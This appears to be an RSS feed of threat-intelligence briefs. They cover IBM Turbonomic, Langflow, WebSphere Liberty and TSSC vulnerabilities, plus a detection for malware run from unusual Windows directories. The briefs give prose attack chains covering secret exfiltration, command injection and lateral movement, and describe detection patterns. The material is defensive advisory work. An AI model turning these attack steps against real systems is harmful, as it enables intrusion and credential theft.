https://feed.craftedsignal.io/vendors/ibm/Trending threats, MITRE ATT&CK coverage, and detection metadata — refreshed continuously.Hugoenhello@craftedsignal.iohello@craftedsignal.ioThu, 30 Apr 2026 22:16:26 +0000https://feed.craftedsignal.io/briefs/2026-04-turbonomic-privesc/Thu, 30 Apr 2026 22:16:26 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-turbonomic-privesc/IBM Turbonomic prometurbo agent versions 8.16.0 through 8.17.6 grants excessive cluster-wide permissions, including unrestricted read access to all secrets, allowing a compromised operator or service account to exfiltrate credentials, escalate privileges, and achieve full cluster compromise.CVE-2026-6389 affects IBM Turbonomic prometurbo agent versions 8.16.0 through 8.17.6. The vulnerability stems from the agent granting excessive cluster-wide permissions within IBM Turbonomic Application Resource Management. A successful exploit allows an attacker who has compromised the operator or its associated service account to gain unrestricted read access to all secrets within the cluster. This vulnerability was reported on April 30, 2026, and poses a significant risk to organizations using the affected versions, potentially leading to complete cluster compromise. Defenders should prioritize patching and monitoring for unauthorized access to sensitive resources.

Attack Chain

1. Attacker gains initial access to the Kubernetes cluster, potentially through exploiting a vulnerability in a separate application or service running within the cluster, or via compromised credentials.
2. The attacker identifies the IBM Turbonomic prometurbo agent and its associated service account within the compromised cluster.
3. The attacker leverages the compromised service account or operator to interact with the Kubernetes API, exploiting the excessive cluster-wide permissions granted to the prometurbo agent.
4. The attacker utilizes the unrestricted read access to enumerate and exfiltrate sensitive credentials stored as secrets within the cluster, including database passwords, API keys, and other sensitive information.
5. Using the stolen credentials, the attacker escalates privileges by accessing other services and resources within the cluster, such as deploying malicious pods or modifying existing deployments.
6. The attacker achieves persistence by creating or modifying service accounts, roles, and role bindings to maintain access to the cluster even if the initial point of compromise is remediated.
7. The attacker moves laterally within the cluster, compromising additional nodes and workloads to expand their control and access to sensitive data.
8. The attacker achieves full cluster compromise, gaining complete control over all resources and data within the Kubernetes environment.

Impact

A successful exploitation of CVE-2026-6389 can lead to a full compromise of the Kubernetes cluster. This includes unrestricted access to sensitive data and the ability to control all workloads and resources within the environment. The impact includes potential data breaches, service disruptions, and significant financial and reputational damage. Organizations in any sector using the affected versions of IBM Turbonomic are at risk, and the severity is heightened in environments handling sensitive data or critical infrastructure.

Recommendation

• Upgrade IBM Turbonomic prometurbo agent to a version beyond 8.17.6 to patch CVE-2026-6389.
• Review and restrict the permissions granted to the prometurbo agent service account, adhering to the principle of least privilege (reference: CVE-2026-6389).
• Implement Kubernetes audit logging to monitor for unauthorized access to secrets and other sensitive resources (reference: Kubernetes documentation).
• Deploy the Sigma rule “Detect Kubernetes Secret Access via Turbonomic Agent” to identify potential exploitation attempts (reference: Sigma rule below).
• Monitor for unusual activity originating from the prometurbo agent service account, such as attempts to access or exfiltrate large amounts of data (reference: network_connection log source).
• Implement network segmentation to limit the potential impact of a compromised cluster, preventing lateral movement to other environments.

]]>criticaladvisoryprivilege-escalationcredential-accesskubernetesvulnerabilityhttps://feed.craftedsignal.io/briefs/2026-04-ibm-langflow-rce/Thu, 30 Apr 2026 22:16:26 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-ibm-langflow-rce/IBM Langflow Desktop versions 1.0.0 through 1.8.4 are vulnerable to remote command execution, allowing an attacker to execute arbitrary commands with the privileges of the Langflow process, potentially leading to sensitive data exposure and lateral movement.IBM Langflow Desktop, a tool designed to build and experiment with language models, versions 1.0.0 through 1.8.4, contains a remote command execution vulnerability (CVE-2026-6543). An attacker with the ability to influence Langflow’s execution can inject and execute arbitrary commands with the same privileges as the Langflow process. This flaw can be exploited to read sensitive environment variables containing API keys and database credentials, modify critical files, and propagate further attacks within the internal network. The vulnerability poses a significant risk to organizations utilizing affected versions of Langflow Desktop, potentially leading to data breaches and system compromise. Defenders should prioritize patching or implementing mitigations to prevent exploitation.

Attack Chain

1. Attacker gains initial access to a system with Langflow Desktop installed (versions 1.0.0 - 1.8.4). This could be achieved through social engineering or by compromising a user account with access to the system.
2. The attacker crafts a malicious input or payload designed to exploit the command execution vulnerability within Langflow.
3. The attacker triggers Langflow to process the malicious payload, leveraging the vulnerability to inject and execute arbitrary commands.
4. The injected command executes with the privileges of the Langflow process, allowing the attacker to interact with the underlying operating system.
5. The attacker leverages command execution to read sensitive environment variables, potentially obtaining API keys, database credentials, or other sensitive information.
6. The attacker uses the acquired credentials to access sensitive data or systems within the internal network, escalating their privileges and expanding their reach.
7. The attacker modifies critical files or installs malicious software, establishing persistence and compromising the integrity of the system.
8. The attacker launches further attacks on the internal network, leveraging the compromised system as a pivot point to compromise additional systems and data.

Impact

Successful exploitation of CVE-2026-6543 allows attackers to execute arbitrary commands on systems running vulnerable versions of IBM Langflow Desktop. This can lead to the exposure of sensitive environment variables containing API keys and database credentials, the modification of critical files, and the launching of further attacks on the internal network. The impact can range from data breaches and system compromise to complete control over affected systems and networks. Given the nature of Langflow, targeted sectors likely include organizations involved in AI/ML development and related fields.

Recommendation

• Upgrade IBM Langflow Desktop to a patched version beyond 1.8.4 to remediate CVE-2026-6543, as recommended by IBM.
• Deploy the Sigma rule “Detect Langflow Process Spawning Suspicious Processes” to identify potential exploitation attempts based on unusual child processes spawned by Langflow.
• Monitor network connections from Langflow Desktop instances for suspicious outbound traffic, indicating potential data exfiltration or command-and-control activity.
• Implement least privilege principles to limit the impact of successful exploitation by restricting the permissions of the Langflow process.

]]>criticalthreatcve-2026-6543command executioncode injectionibm langflowhttps://feed.craftedsignal.io/briefs/2026-04-langflow-idor/Thu, 30 Apr 2026 21:16:33 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-langflow-idor/IBM Langflow Desktop versions 1.0.0 through 1.8.4 are vulnerable to an indirect object reference (IDOR) vulnerability (CVE-2026-4503), allowing unauthenticated users to view other users' images due to a user-controlled key.IBM Langflow Desktop versions 1.0.0 through 1.8.4 are susceptible to an indirect object reference (IDOR) vulnerability, designated as CVE-2026-4503. This flaw enables unauthenticated attackers to access and view images belonging to other users. The vulnerability arises from the application’s reliance on a user-controlled key to reference objects, which can be manipulated to bypass authorization checks and gain unauthorized access to sensitive image data. This poses a risk to user privacy and data security, as attackers can potentially view confidential or personal images without proper authentication.

Attack Chain

1. An unauthenticated attacker identifies a user-controlled key used to reference image objects within Langflow Desktop.
2. The attacker modifies this key to point to another user’s image object.
3. The attacker sends a request to the Langflow Desktop application using the modified key.
4. The application, due to the IDOR vulnerability, fails to properly validate the attacker’s authorization to access the requested image object.
5. The application retrieves and returns the image data associated with the targeted user’s image.
6. The attacker views the image without authentication.

Impact

Successful exploitation of this vulnerability allows an unauthenticated attacker to view other users’ images within IBM Langflow Desktop. This can lead to a breach of privacy, as sensitive or personal images may be exposed. The number of affected users depends on the number of installations of Langflow Desktop within the vulnerable version range (1.0.0 through 1.8.4).

Recommendation

• Apply the security patch or upgrade to a version of IBM Langflow Desktop that addresses CVE-2026-4503 as detailed in the IBM advisory.
• Implement stricter authorization checks on image object references to prevent unauthorized access, mitigating CVE-2026-4503.

]]>mediumadvisoryidorvulnerabilityprivilege-escalationhttps://feed.craftedsignal.io/briefs/2026-04-websphere-spoofing/Thu, 23 Apr 2026 00:18:31 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-websphere-spoofing/IBM WebSphere Application Server Liberty versions 17.0.0.3 through 26.0.0.4 are susceptible to identity spoofing when applications are deployed without proper authentication and authorization configurations, potentially leading to unauthorized access and privilege escalation.CVE-2026-3621 identifies an identity spoofing vulnerability affecting IBM WebSphere Application Server Liberty versions 17.0.0.3 through 26.0.0.4. This vulnerability arises when applications are deployed on WebSphere Liberty without authentication or authorization mechanisms configured. An attacker could potentially exploit this flaw to impersonate legitimate users or services, gaining unauthorized access to resources and performing actions on their behalf. This vulnerability was reported to IBM and assigned a CVSS v3.1 base score of 7.5, indicating a high potential impact. Successful exploitation allows for unauthorized actions and data access within the vulnerable WebSphere Liberty environment.

Attack Chain

1. An attacker identifies a WebSphere Liberty instance running a vulnerable version (17.0.0.3 - 26.0.0.4).
2. The attacker determines that an application is deployed on the WebSphere Liberty instance without proper authentication or authorization configurations.
3. The attacker crafts a malicious request, spoofing the identity of a legitimate user. This might involve manipulating HTTP headers or other request parameters.
4. The malicious request is sent to the vulnerable application on the WebSphere Liberty server.
5. The WebSphere Liberty server, lacking proper authentication checks, processes the request under the forged identity.
6. The attacker gains unauthorized access to resources or performs actions associated with the spoofed identity.
7. The attacker can potentially escalate privileges by accessing administrative functions or sensitive data accessible to the spoofed user.

Impact

Successful exploitation of CVE-2026-3621 can lead to significant consequences. An attacker could gain unauthorized access to sensitive data, modify application configurations, or perform actions on behalf of legitimate users, potentially leading to data breaches, service disruption, or complete system compromise. The vulnerability is particularly concerning for organizations that rely on WebSphere Liberty for critical applications and have not implemented proper authentication and authorization controls. The number of affected organizations is currently unknown but will depend on the prevalence of vulnerable WebSphere Liberty instances deployed without adequate security measures.

Recommendation

• Apply appropriate authentication and authorization configurations to all applications deployed on IBM WebSphere Application Server Liberty to mitigate CVE-2026-3621, as described in IBM’s advisory.
• Deploy the Sigma rule “Detect WebSphere Liberty Unauthorized Access Attempt” to identify suspicious requests lacking authentication headers.
• Upgrade to a non-vulnerable version of IBM WebSphere Application Server Liberty outside the range of 17.0.0.3 through 26.0.0.4.

]]>mediumadvisorycve-2026-3621websphereidentity spoofingcwe-269https://feed.craftedsignal.io/briefs/2026-04-ibm-tssc-rce/Thu, 23 Apr 2026 00:16:46 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-ibm-tssc-rce/An unauthenticated user can execute arbitrary commands with normal user privileges on vulnerable IBM Total Storage Service Console (TSSC) / TS4500 IMC versions due to improper validation of user-supplied input, as identified by CVE-2026-5935.CVE-2026-5935 describes a critical vulnerability affecting IBM Total Storage Service Console (TSSC) / TS4500 IMC software. Specifically, versions 9.2, 9.3, 9.4, 9.5, and 9.6 are susceptible to unauthenticated remote command execution. The vulnerability stems from insufficient validation of user-supplied input, allowing an attacker to inject and execute arbitrary commands on the system. Successful exploitation grants the attacker normal user privileges. This vulnerability poses a significant risk as it allows attackers to compromise the system without authentication, potentially leading to data breaches, system disruption, or further lateral movement within the network. Defenders should prioritize patching or mitigating this vulnerability.

Attack Chain

1. An unauthenticated attacker identifies a vulnerable IBM Total Storage Service Console (TSSC) / TS4500 IMC instance running versions 9.2, 9.3, 9.4, 9.5, or 9.6.
2. The attacker crafts a malicious request containing an OS command injection payload. This payload is designed to exploit the improper input validation within the TSSC/IMC software.
3. The attacker sends the crafted request to the vulnerable TSSC/IMC instance, targeting a specific endpoint or function susceptible to command injection.
4. The TSSC/IMC software processes the request without proper validation, passing the malicious payload to the underlying operating system.
5. The operating system executes the injected command with the privileges of a normal user account.
6. The attacker gains the ability to execute arbitrary commands on the system, potentially allowing them to read sensitive files, modify configurations, or install malicious software.
7. The attacker may leverage their initial access to escalate privileges, move laterally within the network, or establish persistent access to the compromised system.

Impact

Successful exploitation of CVE-2026-5935 allows an unauthenticated attacker to execute arbitrary commands on the affected IBM Total Storage Service Console (TSSC) / TS4500 IMC system. This can lead to complete system compromise, data breaches, and disruption of services. The impact could range from unauthorized access to sensitive data to the deployment of ransomware, depending on the attacker’s objectives and the level of access achieved after exploitation. Due to the lack of authentication requirement, the vulnerability is highly critical.

Recommendation

• Apply the patch or upgrade to a fixed version of IBM Total Storage Service Console (TSSC) / TS4500 IMC as outlined in the IBM advisory (https://www.ibm.com/support/pages/node/7270127).
• Deploy the Sigma rule to detect command execution via web requests targeting TSSC/IMC.
• Implement network segmentation to limit the blast radius of a potential compromise of the TSSC/IMC system.

]]>criticaladvisorycve-2026-5935rcecommand injectionhttps://feed.craftedsignal.io/briefs/2024-01-process-execution-from-unusual-directory/Thu, 04 Jan 2024 12:00:00 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2024-01-process-execution-from-unusual-directory/Adversaries may execute processes from unusual default Windows directories to masquerade malware and evade defenses by blending in with trusted paths, making malicious activity harder to detect.This detection identifies process execution from suspicious default Windows directories. Attackers may hide malware in trusted paths to evade defenses, making it difficult for analysts to distinguish between legitimate and malicious activity. The detection focuses on identifying processes running from directories like C:\PerfLogs, C:\Users\Public, and various Windows subdirectories (e.g., C:\Windows\Tasks, C:\Windows\AppReadiness), where executable files are not typically expected to reside. The detection excludes known legitimate processes like SpeechUXWiz.exe, SystemSettings.exe, TrustedInstaller.exe and other Intel and IBM executables to reduce false positives. This technique is often used to bypass security controls or take advantage of existing exceptions applied to these directories. This activity was observed being used by threat actors in the Siestagraph campaign.

Attack Chain

1. An attacker gains initial access to the system (e.g., through phishing or exploiting a vulnerability).
2. The attacker drops a malicious executable into a suspicious directory like C:\Users\Public or C:\Windows\Tasks.
3. The attacker executes the malware from the unusual directory. This might be achieved using cmd.exe or powershell.exe.
4. The executed malware establishes persistence by creating a scheduled task or modifying registry keys.
5. The malware connects to a command-and-control (C2) server to receive further instructions.
6. The C2 server instructs the malware to perform reconnaissance on the network.
7. The malware attempts to move laterally to other systems on the network using techniques like pass-the-hash or exploiting vulnerabilities.
8. The attacker achieves their objective, such as data exfiltration, ransomware deployment, or establishing long-term access to the network.

Impact

Successful exploitation can lead to the execution of arbitrary code, persistence on the system, and further compromise of the network. Attackers can use this technique to bypass security controls and evade detection, potentially leading to data breaches, financial loss, or disruption of services. While the rule itself has a medium severity, the impact of a successful attack using this technique can be severe, depending on the attacker’s objectives and the compromised data.

Recommendation

• Deploy the Sigma rule “Process Execution from Unusual Directory” to your SIEM and tune for your environment to detect suspicious process execution.
• Investigate any alerts generated by the Sigma rule to determine if the process execution is legitimate or malicious.
• Enable process creation logging, specifically Event ID 4688 with command line process auditing, to ensure the Sigma rule has the necessary data to function effectively.
• Review and harden permissions on the listed suspicious directories to prevent unauthorized file creation and execution.
• Block execution of unsigned or untrusted executables from these directories using application control solutions.

]]>mediumadvisorydefense-evasionwindowsmasquerading